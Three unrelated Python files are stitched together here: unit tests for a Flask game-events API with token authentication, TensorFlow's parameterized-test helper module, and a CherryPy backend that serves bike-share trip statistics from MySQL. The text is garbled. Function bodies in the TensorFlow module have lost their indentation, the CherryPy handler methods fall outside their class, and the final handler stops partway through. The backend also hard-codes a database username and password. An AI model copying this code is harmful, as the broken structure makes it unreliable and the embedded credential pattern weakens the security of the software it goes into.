        <timestamp>2015-11-29T13:10:57Z</timestamp>
        <which_lix />
        </event>"""
        cls.json_multiple_events = """[{
            "timestamp": "2015-11-29T12:10:57Z",
            "action": "STARTGAME",
            "which_lix": ""
        }, {
            "timestamp": "2015-11-29T13:10:57Z",
            "action": "ENDGAME",
            "which_lix": ""
        }]"""
        time.sleep(3)  # let the expiration=1 tokens above expire
        new_gameevent = GameEvent(new_session.id, cls.xml_valid_event)
        db.session.add(new_gameevent)
        try:
            db.session.commit()
            LOG.info("=== Added game event. All set up. ===")
        except Exception as e:
            LOG.error(e, exc_info=True)

    @classmethod
    def tearDownClass(cls):
        LOG.info("======================Finished tests====================")
        db.session.remove()
        db.drop_all()
        cls.app_context.pop()

    # ------------------------------------------------------------------
    # Request helpers (shared by all tests below)
    # ------------------------------------------------------------------

    def _post_json(self, url, payload, token=None):
        """POST payload (a JSON string) to url; add X-AUTH-TOKEN when given."""
        headers = {}
        if token is not None:
            headers['X-AUTH-TOKEN'] = token
        return self.client.post(url,
                                data=payload,
                                headers=headers,
                                content_type='application/json',
                                follow_redirects=True)

    def _post_events(self, sessionid, events, token):
        """POST a timestamped events payload for the given session."""
        requestdata = json.dumps(dict(timestamp=str(datetime.datetime.now()),
                                      events=events))
        return self._post_json('/gameevents/api/v1.0/sessions/%s/events' % sessionid,
                               requestdata, token)

    def _get(self, url, token=None):
        """GET url; add X-AUTH-TOKEN when given."""
        headers = {}
        if token is not None:
            headers['X-AUTH-TOKEN'] = token
        return self.client.get(url,
                               headers=headers,
                               content_type='application/json',
                               follow_redirects=True)

    # ------------------------------------------------------------------
    # /token endpoint
    # ------------------------------------------------------------------

    def test_token_existing_sessionid(self):
        '''
        Token request with valid credentials and existing sessionid.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey",
                                      sessionid=self.newsessionid))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "200 OK")

    def test_token_nonexisting_but_valid_sessionid(self):
        '''
        Token request with valid credentials and a valid - but still not in the db - sessionid.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey",
                                      sessionid=self.newsessionid3))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "200 OK")

    def test_token_invalid_sessionid(self):
        '''
        Token request with valid credentials but a malformed sessionid.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey",
                                      sessionid="bablablabal"))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_token_unauthorized_sessionid(self):
        '''
        Token request with valid credentials but a sessionid this client
        is not authorized for.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikey",
                                      sessionid=self.unauthorized_sessionid))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    def test_get_admin_token(self):
        '''
        Admin token request with valid credentials.
        '''
        requestdata = json.dumps(dict(clientid="dashboard", apikey="dashboardapikey"))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "200 OK")

    def test_token_badparams(self):
        '''
        Token request with missing parameters.
        '''
        requestdata = json.dumps(dict(clientid="myclientid"))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_token_invalid_apikey(self):
        '''
        Token request with invalid credentials and valid sessionid.
        '''
        requestdata = json.dumps(dict(clientid="myclientidaaaaa", apikey="myapikeyaaaa",
                                      sessionid=self.newsessionid))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    def test_token_invalid_clientid(self):
        '''
        Token request with valid clientid but invalid apikey, and valid sessionid.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="myapikeyaaaa",
                                      sessionid=self.newsessionid))
        response = self._post_json('/gameevents/api/v1.0/token', requestdata)
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    # ------------------------------------------------------------------
    # /sessions/<id>/events endpoint (commit)
    # ------------------------------------------------------------------

    def test_commit_xmlgameevent_validtoken(self):
        '''
        Game event commit request with valid token and invalid game event (in XML instead of JSON).
        '''
        response = self._post_events(self.newsessionid, self.xml_valid_event,
                                     self.mytoken.decode())
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_commit_gameevent_incompletejsonrequest(self):
        '''
        Game event commit request with valid token and a badly formed JSON body.
        '''
        requestdata = "{json:\"badlyformed\""
        response = self._post_json('/gameevents/api/v1.0/sessions/%s/events' % self.newsessionid,
                                   requestdata, self.mytoken.decode())
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_commit_jsongameevent_validtoken(self):
        '''
        Game event commit request with valid token and valid game event.
        '''
        response = self._post_events(self.newsessionid, self.json_valid_event,
                                     self.mytoken.decode())
        self.assertEqual(response.status, "201 CREATED")

    def test_commit_invalidjsongameevent_validtoken(self):
        '''
        Game event commit request with valid token and invalid game event (invalid JSON).
        '''
        response = self._post_events(self.newsessionid, self.json_invalid_event,
                                     self.mytoken.decode())
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_commit_invalidxmlgameevent_validtoken(self):
        '''
        Game event commit request with valid token and invalid game event (in invalid XML).
        '''
        response = self._post_events(self.newsessionid, self.xml_invalid_event,
                                     self.mytoken.decode())
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_commit_multiplexmlgameevent_validtoken(self):
        '''
        Game event commit request with valid token and multiple game events (but in XML, not JSON).
        '''
        response = self._post_events(self.newsessionid, self.xml_multiple_events,
                                     self.mytoken.decode())
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_commit_multiplejsongameevent_validtoken(self):
        '''
        Game event commit request with valid token and multiple valid game events.
        '''
        response = self._post_events(self.newsessionid, self.json_multiple_events,
                                     self.mytoken.decode())
        json_results = json.loads(response.get_data().decode())
        self.assertEqual(json_results["message"], "Created 2 new item(s).")
        self.assertEqual(response.status, "201 CREATED")

    def test_commit_gameevent_validtoken_newsessionid(self):
        '''
        Game event commit request with valid token but for a session not in the database.
        '''
        response = self._post_events(self.newsessionid3, self.json_valid_event,
                                     self.mytokennewsession.decode())
        self.assertEqual(response.status, "404 NOT FOUND")

    def test_commit_gameevent_expiredtoken(self):
        '''
        Game event commit request with expired token.
        '''
        response = self._post_events(self.newsessionid, self.json_valid_event,
                                     self.myexpiredtoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    def test_commit_gameevent_badtoken(self):
        '''
        Game event commit request with bad token.
        '''
        response = self._post_events(self.newsessionid, self.json_valid_event,
                                     self.mybadtoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    # ------------------------------------------------------------------
    # /sessions/<id>/events endpoint (list)
    # ------------------------------------------------------------------

    def test_getgameevents(self):
        '''
        List game events for a given session with valid token.
        '''
        response = self._get('/gameevents/api/v1.0/sessions/%s/events' % self.newsessionid,
                             self.mytoken.decode())
        self.assertEqual(response.status, "200 OK")

    def test_getgameevents_badtoken(self):
        '''
        List game events for a given session with invalid token.
        '''
        response = self._get('/gameevents/api/v1.0/sessions/%s/events' % self.newsessionid,
                             self.mybadtoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    # ------------------------------------------------------------------
    # /admin/clients endpoint
    # ------------------------------------------------------------------

    def test_newclient_admintoken(self):
        '''
        Add a new client to database, using admin token, with good parameters.
        '''
        requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients',
                                   requestdata, self.myadmintoken.decode())
        self.assertEqual(response.status, "201 CREATED")

    def test_newclient_bad_request_missing_params(self):
        '''
        Try to add a new client to database, without a token.
        '''
        requestdata = json.dumps(dict(clientid="lix", apikey="lixapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients', requestdata)
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_newexistingclient(self):
        '''
        Try to add client that already exists in database, using admin token, with good parameters.
        '''
        requestdata = json.dumps(dict(clientid="myclientid", apikey="testapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients',
                                   requestdata, self.myadmintoken.decode())
        self.assertEqual(response.status, "409 CONFLICT")

    def test_newclient_nonadmintoken(self):
        '''
        Try to add a new client to database, with non-admin token.
        '''
        requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients',
                                   requestdata, self.mytoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    def test_newclient_expiredadmintoken(self):
        '''
        Try to add a new client to database, with expired admin token.
        '''
        requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients',
                                   requestdata, self.myexpiredadmintoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    def test_newclient_badtoken(self):
        '''
        Try to add a new client to database, with bad token.
        '''
        requestdata = json.dumps(dict(clientid="testclientid", apikey="testapikey"))
        response = self._post_json('/gameevents/api/v1.0/admin/clients',
                                   requestdata, self.mybadtoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")

    # ------------------------------------------------------------------
    # /sessions endpoint
    # ------------------------------------------------------------------

    def test_getsessions_validtoken(self):
        '''
        Get list of active sessions, with valid admin token.
        '''
        response = self._get('/gameevents/api/v1.0/sessions', self.myadmintoken.decode())
        self.assertEqual(response.status, "200 OK")

    def test_getsessions_notoken(self):
        '''
        Get list of active sessions, without a token.
        '''
        response = self._get('/gameevents/api/v1.0/sessions')
        self.assertEqual(response.status, "400 BAD REQUEST")

    def test_getsessions_invalidtoken(self):
        '''
        Get list of active sessions, with expired admin token.
        '''
        response = self._get('/gameevents/api/v1.0/sessions', self.myexpiredadmintoken.decode())
        self.assertEqual(response.status, "401 UNAUTHORIZED")
# Allow running this test module directly: python <module>.py
if __name__ == '__main__':
    unittest.main()
|
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds support for parameterized tests to Python's unittest TestCase class.
A parameterized test is a method in a test case that is invoked with different
argument tuples.
A simple example:
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
(1, 2, 3),
(4, 5, 9),
(1, 1, 3))
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
Each invocation is a separate test case and properly isolated just
like a normal test method, with its own setUp/tearDown cycle. In the
example above, there are three separate testcases, one of which will
fail due to an assertion error (1 + 1 != 3).
Parameters for individual test cases can be tuples (with positional parameters)
or dictionaries (with named parameters):
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
{'op1': 1, 'op2': 2, 'result': 3},
{'op1': 4, 'op2': 5, 'result': 9},
)
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
If a parameterized test fails, the error message will show the
original test name (which is modified internally) and the arguments
for the specific invocation, which are part of the string returned by
the shortDescription() method on test cases.
The id method of the test, used internally by the unittest framework,
is also modified to show the arguments. To make sure that test names
stay the same across several invocations, object representations like
>>> class Foo(object):
... pass
>>> repr(Foo())
'<__main__.Foo object at 0x23d8610>'
are turned into '<__main__.Foo>'. For even more descriptive names,
especially in test logs, you can use the NamedParameters decorator. In
this case, only tuples are supported, and the first parameters has to
be a string (or an object that returns an apt name when converted via
str()):
class NamedExample(parameterized.ParameterizedTestCase):
@parameterized.NamedParameters(
('Normal', 'aa', 'aaa', True),
('EmptyPrefix', '', 'abc', True),
('BothEmpty', '', '', True))
def testStartsWith(self, prefix, string, result):
self.assertEqual(result, string.startswith(prefix))
Named tests also have the benefit that they can be run individually
from the command line:
$ testmodule.py NamedExample.testStartsWithNormal
.
--------------------------------------------------------------------
Ran 1 test in 0.000s
OK
Parameterized Classes
=====================
If invocation arguments are shared across test methods in a single
ParameterizedTestCase class, instead of decorating all test methods
individually, the class itself can be decorated:
@parameterized.Parameters(
(1, 2, 3),
(4, 5, 9))
class ArithmeticTest(parameterized.ParameterizedTestCase):
def testAdd(self, arg1, arg2, result):
self.assertEqual(arg1 + arg2, result)
def testSubtract(self, arg1, arg2, result):
self.assertEqual(result - arg1, arg2)
Inputs from Iterables
=====================
If parameters should be shared across several test cases, or are dynamically
created from other sources, a single non-tuple iterable can be passed into
the decorator. This iterable will be used to obtain the test cases:
class AdditionExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
c.op1, c.op2, c.result for c in testcases
)
def testAddition(self, op1, op2, result):
self.assertEqual(result, op1 + op2)
Single-Argument Test Methods
============================
If a test method takes only one argument, the single arguments must not be
wrapped into a tuple:
class NegativeNumberExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
-1, -3, -4, -5
)
def testIsNegative(self, arg):
self.assertTrue(IsNegative(arg))
List/tuple as a Single Argument
===============================
If a test method takes a single argument of a list/tuple, it must be wrapped
inside a tuple:
class ZeroSumExample(parameterized.ParameterizedTestCase):
@parameterized.Parameters(
([-1, 0, 1], ),
([-2, 0, 2], ),
)
def testSumIsZero(self, arg):
self.assertEqual(0, sum(arg))
"""
import collections
import functools
import re
import types
import unittest
import uuid
import six
from tensorflow.python.platform import googletest
ADDR_RE = re.compile(r'\<([a-zA-Z0-9_\-\.]+) object at 0x[a-fA-F0-9]+\>')
_SEPARATOR = uuid.uuid1().hex
_FIRST_ARG = object()
_ARGUMENT_REPR = object()
def _CleanRepr(obj):
return ADDR_RE.sub(r'<\1>', repr(obj))
# Helper function formerly from the unittest module, removed from it in
# Python 2.7.
def _StrClass(cls):
return '%s.%s' % (cls.__module__, cls.__name__)
def _NonStringIterable(obj):
  """True if obj is iterable but is not a string.

  Strings are iterable too, but for parameter lists they are treated as a
  single value, not as a sequence of characters.
  """
  # collections.Iterable was deprecated in Python 3.3 and removed in 3.10;
  # prefer collections.abc and fall back for very old interpreters.
  iterable_type = getattr(collections, 'abc', collections).Iterable
  return (isinstance(obj, iterable_type) and not
          isinstance(obj, six.string_types))
def _FormatParameterList(testcase_params):
  """Render testcase parameters as 'a=1, b=2' (dict) or 'v1, v2' (sequence).

  A single non-iterable value is wrapped in a tuple and formatted the same
  way. Used to build descriptive test ids and docstrings.
  """
  # collections.Mapping was removed in Python 3.10; use collections.abc
  # (available since 3.3) with a fallback for older interpreters.
  mapping_type = getattr(collections, 'abc', collections).Mapping
  if isinstance(testcase_params, mapping_type):
    return ', '.join('%s=%s' % (argname, _CleanRepr(value))
                     for argname, value in six.iteritems(testcase_params))
  elif _NonStringIterable(testcase_params):
    return ', '.join(map(_CleanRepr, testcase_params))
  else:
    return _FormatParameterList((testcase_params,))
class _ParameterizedTestIter(object):
  """Callable and iterable class for producing new test cases."""

  def __init__(self, test_method, testcases, naming_type):
    """Returns concrete test functions for a test and a list of parameters.

    The naming_type is used to determine the name of the concrete
    functions as reported by the unittest framework. If naming_type is
    _FIRST_ARG, the testcases must be tuples, and the first element must
    have a string representation that is a valid Python identifier.

    Args:
      test_method: The decorated test method.
      testcases: (list of tuple/dict) A list of parameter
                 tuples/dicts for individual test invocations.
      naming_type: The test naming type, either _NAMED or _ARGUMENT_REPR.
    """
    self._test_method = test_method
    self.testcases = testcases
    self._naming_type = naming_type
    # Mimic a function so the metaclass treats this object like a test.
    self.__name__ = _ParameterizedTestIter.__name__

  def __call__(self, *args, **kwargs):
    raise RuntimeError('You appear to be running a parameterized test case '
                       'without having inherited from parameterized.'
                       'ParameterizedTestCase. This is bad because none of '
                       'your test cases are actually being run. You may also '
                       'be using a mock annotation before the parameterized '
                       'one, in which case you should reverse the order.')

  def __iter__(self):
    test_method = self._test_method
    naming_type = self._naming_type

    def MakeBoundParamTest(testcase_params):
      @functools.wraps(test_method)
      def BoundParamTest(self):
        # collections.Mapping was removed in Python 3.10; use collections.abc
        # (available since 3.3) with a fallback for older interpreters.
        mapping_type = getattr(collections, 'abc', collections).Mapping
        if isinstance(testcase_params, mapping_type):
          test_method(self, **testcase_params)
        elif _NonStringIterable(testcase_params):
          test_method(self, *testcase_params)
        else:
          test_method(self, testcase_params)

      if naming_type is _FIRST_ARG:
        # Signal the metaclass that the name of the test function is unique
        # and descriptive.
        BoundParamTest.__x_use_name__ = True
        # Support PEP-8 underscore style for test naming if used.
        if (BoundParamTest.__name__.startswith('test_')
            and testcase_params[0]
            and not testcase_params[0].startswith('_')):
          BoundParamTest.__name__ += '_'
        BoundParamTest.__name__ += str(testcase_params[0])
        testcase_params = testcase_params[1:]
      elif naming_type is _ARGUMENT_REPR:
        # __x_extra_id__ is used to pass naming information to the __new__
        # method of TestGeneratorMetaclass.
        # The metaclass will make sure to create a unique, but nondescriptive
        # name for this test.
        BoundParamTest.__x_extra_id__ = '(%s)' % (
            _FormatParameterList(testcase_params),)
      else:
        raise RuntimeError('%s is not a valid naming type.' % (naming_type,))

      BoundParamTest.__doc__ = '%s(%s)' % (
          BoundParamTest.__name__, _FormatParameterList(testcase_params))
      if test_method.__doc__:
        BoundParamTest.__doc__ += '\n%s' % (test_method.__doc__,)
      return BoundParamTest

    return (MakeBoundParamTest(c) for c in self.testcases)
def _IsSingletonList(testcases):
"""True iff testcases contains only a single non-tuple element."""
return len(testcases) == 1 and not isinstance(testcases[0], tuple)
def _ModifyClass(class_object, testcases, naming_type):
  """Replace each test method on class_object with parameterized variants.

  Every attribute whose name starts with the unittest test prefix is removed
  and re-added once per testcase via _UpdateClassDictForParamTestCase.
  Refuses to run twice on the same class (guarded by _id_suffix).
  """
  assert not getattr(class_object, '_id_suffix', None), (
      'Cannot add parameters to %s,'
      ' which already has parameterized methods.' % (class_object,))
  # Maps generated test names to the extra id suffix shown by id().
  class_object._id_suffix = id_suffix = {}
  # Iterate over a copy: the loop mutates the class while walking its dict.
  for name, obj in list(six.iteritems(class_object.__dict__)):
    if (name.startswith(unittest.TestLoader.testMethodPrefix)
        and isinstance(obj, types.FunctionType)):
      delattr(class_object, name)
      methods = {}
      _UpdateClassDictForParamTestCase(
          methods, id_suffix, name,
          _ParameterizedTestIter(obj, testcases, naming_type))
      for name, meth in six.iteritems(methods):
        setattr(class_object, name, meth)
def _ParameterDecorator(naming_type, testcases):
  """Implementation of the parameterization decorators.

  Args:
    naming_type: The naming type (_FIRST_ARG or _ARGUMENT_REPR).
    testcases: Testcase parameters.
  Returns:
    A function for modifying the decorated object.
  """
  def _Apply(obj):
    if isinstance(obj, type):
      # Decorating a class: rewrite all of its test methods in place.
      # collections.Sequence was removed in Python 3.10; use collections.abc
      # (available since 3.3) with a fallback for older interpreters.
      sequence_type = getattr(collections, 'abc', collections).Sequence
      _ModifyClass(
          obj,
          list(testcases) if not isinstance(testcases, sequence_type)
          else testcases,
          naming_type)
      return obj
    else:
      # Decorating a method: hand back an iterable the metaclass expands.
      return _ParameterizedTestIter(obj, testcases, naming_type)

  if _IsSingletonList(testcases):
    assert _NonStringIterable(testcases[0]), (
        'Single parameter argument must be a non-string iterable')
    testcases = testcases[0]
  return _Apply
def Parameters(*testcases):
  """A decorator for creating parameterized tests.

  See the module docstring for a usage example.

  Args:
    *testcases: Parameters for the decorated method, either a single
                iterable, or a list of tuples/dicts/objects (for tests
                with only one argument).
  Returns:
    A test generator to be handled by TestGeneratorMetaclass.
  """
  decorator = _ParameterDecorator(_ARGUMENT_REPR, testcases)
  return decorator
def NamedParameters(*testcases):
  """A decorator for creating parameterized tests.

  See the module docstring for a usage example. The first element of
  each parameter tuple should be a string and will be appended to the
  name of the test method.

  Args:
    *testcases: Parameters for the decorated method, either a single
                iterable, or a list of tuples.
  Returns:
    A test generator to be handled by TestGeneratorMetaclass.
  """
  decorator = _ParameterDecorator(_FIRST_ARG, testcases)
  return decorator
class TestGeneratorMetaclass(type):
  """Metaclass for test cases with test generators.

  A test generator is an iterable in a testcase that produces callables. These
  callables must be single-argument methods. These methods are injected into
  the class namespace and the original iterable is removed. If the name of the
  iterable conforms to the test pattern, the injected methods will be picked
  up as tests by the unittest framework.

  In general, it is supposed to be used in conjunction with the
  Parameters decorator.
  """

  def __new__(mcs, class_name, bases, dct):
    # Maps generated test names to the extra id suffix shown by id().
    dct['_id_suffix'] = id_suffix = {}
    # Iterate over a copy: _UpdateClassDictForParamTestCase mutates dct.
    for name, obj in list(six.iteritems(dct)):
      if (name.startswith(unittest.TestLoader.testMethodPrefix) and
          _NonStringIterable(obj)):
        iterator = iter(obj)
        dct.pop(name)
        _UpdateClassDictForParamTestCase(dct, id_suffix, name, iterator)
    return type.__new__(mcs, class_name, bases, dct)
def _UpdateClassDictForParamTestCase(dct, id_suffix, name, iterator):
"""Adds individual test cases to a dictionary.
Args:
dct: The target dictionary.
id_suffix: The dictionary for mapping names to test IDs.
name: The original name of the test case.
iterator: The iterator generating the individual test cases.
"""
for idx, func in enumerate(iterator):
assert callable(func), 'Test generators must yield callables, got %r' % (
func,)
if getattr(func, '__x_use_name__', False):
new_name = func.__name__
else:
new_name = '%s%s%d' % (name, _SEPARATOR, idx)
assert new_name not in dct, (
'Name of parameterized test case "%s" not unique' % (new_name,))
dct[new_name] = func
id_suffix[new_name] = getattr(func, '__x_extra_id__', '')
class ParameterizedTestCase(
    six.with_metaclass(TestGeneratorMetaclass, googletest.TestCase)):
    """Base class for test cases using the Parameters decorator."""

    def _OriginalName(self):
        # Generated method names look like "<original><separator><index>";
        # everything before the first separator is the original name.
        return self._testMethodName.split(_SEPARATOR)[0]

    def __str__(self):
        return '{0} ({1})'.format(self._OriginalName(), _StrClass(self.__class__))

    def id(self):  # pylint: disable=invalid-name
        """Returns the descriptive ID of the test.

        This is used internally by the unittesting framework to get a name
        for the test to be used in reports.

        Returns:
          The test id.
        """
        suffix = self._id_suffix.get(self._testMethodName, '')
        return '%s.%s%s' % (_StrClass(self.__class__), self._OriginalName(), suffix)
|
|
import sys
# Redirect stdout to stderr so the debug "print" statements in the
# handlers end up in the server's error log (mod_wsgi swallows stdout).
sys.stdout = sys.stderr
import os
import atexit
import threading
import cherrypy
import MySQLdb
import pickle
import subprocess
from collections import OrderedDict
from datetime import datetime
from dateutil import parser
# Module-level MySQL connection shared by every request handler.
# NOTE(review): credentials are hard-coded in source; consider moving
# them to configuration outside the source tree.
db = MySQLdb.connect(
    host="127.0.0.1",
    user="divvy",
    passwd="keepC4LM",
    db="divvy"
)
# PATH prefixes all data files (pickles, cache directory).  On the
# "praxis" development host the files live in the working directory.
if subprocess.check_output("hostname") == "praxis\n":
    PATH = ""
else:
    PATH = "/var/www/cs424/p2/py"
# Single shared cursor used by all handlers.
# NOTE(review): one cursor shared across concurrent requests is not
# thread-safe -- confirm the server runs these handlers serially.
c = db.cursor()
def parse_age(age):
    """Map an age-group label (as displayed in the pie chart) to bounds.

    Args:
        age: str, one of "Under 20", "20-29", "30-39", "40-49", "50-59"
            or "60+".  (The original docstring said int, but callers pass
            the group label strings shown in the chart.)

    Returns:
        A two-tuple (low, high) of ints, both exclusive, suitable for the
        "age_in_2014 > low AND age_in_2014 < high" SQL filters built by
        the request handlers; None when the label is not recognized
        (matching the original fall-through behavior).
    """
    groups = {
        "Under 20": (0, 20),
        "20-29": (19, 30),
        "30-39": (29, 40),
        "40-49": (39, 50),
        "50-59": (49, 60),
        "60+": (59, 180),
    }
    return groups.get(age)
def parse_time_of_day(time_of_day):
    """Given a time-of-day label, return its hour range (inclusive).

    Args:
        time_of_day: str, one of "morning", "lunch", "after work" or
            "evening".

    Returns:
        A two-tuple of inclusive hours (low, high); None for unknown
        labels.
        NOTE(review): "after work" -> (4, 7) and "evening" -> (7, 9) look
        like 12-hour clock values while "morning"/"lunch" are 24-hour --
        confirm this asymmetry is intended.
    """
    ranges = {
        "morning": (6, 9),
        "lunch": (11, 13),
        "after work": (4, 7),
        "evening": (7, 9),
    }
    return ranges.get(time_of_day)
def store_popularity_groups():
    """Group stations into 7 popularity tiers and pickle the result.

    Offline utility: reads stations.pickle (station id -> name) and
    id_popularity.pickle (station id -> ride count) from the working
    directory, then writes popularity.pickle mapping tier number
    (0 = ten most popular stations) to a list of station names.

    Fixes vs. original: dict.values() is a view in Python 3 and has no
    .sort(); use sorted() instead.  The seven copy-pasted elif branches
    are replaced by a table of rank-slice boundaries.
    """
    with open("stations.pickle", "rb") as f:
        stations = pickle.load(f)
    with open("id_popularity.pickle", "rb") as f:
        id_pop = pickle.load(f)
    ranked = sorted(id_pop.values())
    # Tier boundaries are rank slices of the sorted count list; a station
    # lands in the first tier whose slice contains its count (ties resolve
    # to the earlier tier, exactly like the original elif chain).
    tiers = [(0, 10), (10, 50), (50, 100), (100, 150),
             (150, 200), (200, 250), (250, 300)]
    grouped = dict((i, []) for i in range(7))
    for sid, count in id_pop.items():
        for tier, (lo, hi) in enumerate(tiers):
            if count in ranked[lo:hi]:
                grouped[tier].append(stations[sid])
                break
    with open("popularity.pickle", "wb") as f:
        pickle.dump(grouped, f)
# Run embedded (e.g. under mod_wsgi) and log errors to /tmp.
cherrypy.config.update({'environment': 'embedded', 'show_tracebacks': True, 'log.error_file': '/tmp/p2site.log'})
# CherryPy 3.0 does not start its engine automatically when embedded;
# start it here and make sure it is stopped at interpreter exit.
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
    cherrypy.engine.start(blocking=False)
    atexit.register(cherrypy.engine.stop)
class Root(object):
    """Root class for the cherrypy instance running the backend.

    Every exposed method below is an HTTP endpoint that returns CSV or
    JSON-like text and sets a permissive CORS header on the response.
    """
def index(self):
    """Hello world, for index -- a simple liveness check."""
    headers = cherrypy.response.headers
    headers["Access-Control-Allow-Origin"] = "*"
    return 'Hello World!'
index.exposed = True
def rides_by_day_of_year(self):
    """Display the number of rides on each day of the year.

    Returns:
        a csv like Date,Count.  The Date column is only filled in for
        axis-label rows (the first day of each month, plus the launch
        day June 27 2013); all other rows get a blank label.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    q = """
        SELECT
            startdate,
            count(*)
        FROM
            divvy_trips_distances
        GROUP BY
            startdate
    """
    c.execute(q)
    ret = ["Date,Count"]
    # BUG FIX: the original compared each row against the *bound method*
    # parser.parse('2013-06-27').date (no call), which is never equal to
    # a date object, so the launch-day label was never emitted.  Also
    # hoisted out of the loop and removed the debug prints.
    launch_day = parser.parse('2013-06-27').date()
    for row in c.fetchall():
        dt = row[0]
        if dt == launch_day:
            date = 'June 27, 2013'
        elif dt.day == 1:
            date = "%s %s" % (dt.strftime("%b"), dt.year)
        else:
            date = " "
        ret.append("%s,%s" % (date, row[1]))
    return "\n".join(ret)
rides_by_day_of_year.exposed = True
def gender(self,
           date=None,
           gender=None,
           subscriber=None,
           age=None,
           stations=None):
    """Display the gender breakdown of riders based on filters.

    Args (all optional):
        date - string - a start date, e.g. "2013-06-27"
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string like "low,high" (both bounds exclusive)
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        a csv like Gender,Count; a NULL gender is reported as Unknown.
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # SECURITY FIX: request values are bound as query parameters instead
    # of being %-interpolated into the SQL text (SQL injection).
    where_stmts = []
    params = []
    if date:
        where_stmts.append("startdate like %s")
        params.append(date)
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        # Match the stored usertype by prefix, e.g. "Subscriber%".
        where_stmts.append("usertype like %s")
        params.append(subscriber + "%")
    if age:
        bottom, top = age.split(",")
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
    q = """
        SELECT
            gender,
            count(*)
        FROM
            divvy_trips_distances
        %s
        GROUP BY
            gender
    """ % where
    c.execute(q, params or None)
    ret = ["Gender,Count"]
    for row in c.fetchall():
        if not row[0]:
            ret.append("Unknown,%d" % row[1])
        else:
            ret.append("%s,%d" % (row[0], row[1]))
    return "\n".join(ret)
gender.exposed = True
def usertype(self,
             date=None,
             gender=None,
             subscriber=None,
             age=None,
             stations=None):
    """Displays statistics on usertype, based on filters.

    Args (all optional):
        date - string - a start date, e.g. "2013-06-27"
        gender - string - Male or Female
        subscriber - string - Subscriber or Customer
        age - a string like "low,high" (both bounds exclusive)
        stations - a string like "station_id1,station_id2,station_id3"

    Returns:
        a csv like Type,Count
    """
    cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
    # SECURITY FIX: request values are bound as query parameters instead
    # of being %-interpolated into the SQL text (SQL injection).
    where_stmts = []
    params = []
    if date:
        where_stmts.append("startdate like %s")
        params.append(date)
    if gender:
        where_stmts.append("gender like %s")
        params.append(gender)
    if subscriber:
        # Match the stored usertype by prefix, e.g. "Subscriber%".
        where_stmts.append("usertype like %s")
        params.append(subscriber + "%")
    if age:
        bottom, top = age.split(",")
        where_stmts.append("age_in_2014 < %s")
        params.append(top)
        where_stmts.append("age_in_2014 > %s")
        params.append(bottom)
    if stations:
        # Since it's bikes out, we only look at the departing station.
        station_ids = stations.split(",")
        where_stmts.append("from_station_id in (%s)"
                           % ", ".join(["%s"] * len(station_ids)))
        params.extend(station_ids)
    where = ("WHERE " + " AND ".join(where_stmts)) if where_stmts else ""
